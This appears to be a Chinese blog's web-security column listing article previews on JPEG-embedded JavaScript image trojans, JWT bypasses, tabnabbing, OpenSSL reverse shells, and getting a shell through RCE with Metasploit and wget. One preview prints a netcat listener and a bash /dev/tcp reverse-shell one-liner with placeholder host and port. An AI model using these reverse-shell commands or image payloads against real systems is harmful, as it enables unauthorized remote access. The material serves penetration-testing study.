
web安全
文章平均质量分 58
连人
这个作者很懒,什么都没留下…
展开
-
JPEG文件内嵌HTML代码(JavaScript型图片马)
对未校验后缀名的图片上传接口打击较大,优势在于比未做伪装的html恶意代码更易隐藏,因为标签指向它的时候会正常显示图片。0x0166:注释后紧跟的16进制数值,被选中部分长度为358字节,换算为16进制为166;0xFFFE:jpeg文件注释开始标志;0xFFD8:jpeg文件开始标志;0xFFE0:标志图片内容开始。(图为winhex)原创 2023-12-21 16:54:56 · 654 阅读 · 0 评论 -
JSON Web Token JWT几种简单的绕过方法
这个部分需要base64加密后的header和base64加密后的payload使用.连接组成的字符串,然后通过header中声明的加密方式进行加盐secret组合加密,然后就构成了jwt的第三部分。如图所示JWT由三部分构成,分别是header,payload和signature,在这三者之间由"."连接。在payload中,iot代表JWT生成时间,exp代表JWT失效时间,延长exp时间也可进行绕过。如图为JWT加密后的示例,JWT再由后端返回至前端后,由前端封装到HTTP Header中。原创 2023-12-21 15:15:40 · 986 阅读 · 0 评论 -
<a>标签target=“_blank“ 焦点窃取漏洞
1、标签中使用target="_blank"时,代表打开一个新的页面,此时新开的页面与旧页面存在从属关系,新页面可以使用window.opener操作旧页面,造成漏洞;2、目前高级浏览器已修复该漏洞,以下实现均在IE模式下;原创 2023-12-21 14:45:19 · 598 阅读 · 0 评论 -
使用OpenSSL的反弹shell
使用openssl进行反弹shell的过程原创 2023-10-12 17:01:44 · 593 阅读 · 0 评论 -
模拟渗透测试——使用metasploit与wget获取靶机shell
前言近日在复现漏洞时,由于目标所提供的服务中的某段代码没有对权限进行检查,导致了远程命令执行——RCE漏洞。由于该漏洞本身的特性,所能执行的命令是需要通过url进行拼接且每次只可执行一句,因此尝试获取靶机shell来做到更多的事。但在尝试的过程中发现目标对于防渗透措施做的相当不错,删除或者禁用了很多命令,上篇文章(《反弹shell常用命令》)所提到的所有方式都没有尝试成功。但天无绝人之路,busybox中wget的身影吸引了我的注意。环境准备靶机:ubuntu 192.168.116.128攻击原创 2021-01-19 14:54:53 · 1650 阅读 · 0 评论 -
反弹shell常用命令
反弹shell常用命令1 attacker端的监听——netcat(1) windows环境下下载netcat下载地址将如图的nc.exe所在文件夹添加到环境变量(2) linux环境下下载netcatyum install netcat(3) 安装结束使用如下命令判断是否安装成功nc -h使用如下命令开始监听nc -lvvp port2 靶机命令(1) bashbash一句话为:bash -i >& /dev/tcp/ip/port 0>&a原创 2021-01-15 17:04:11 · 8831 阅读 · 0 评论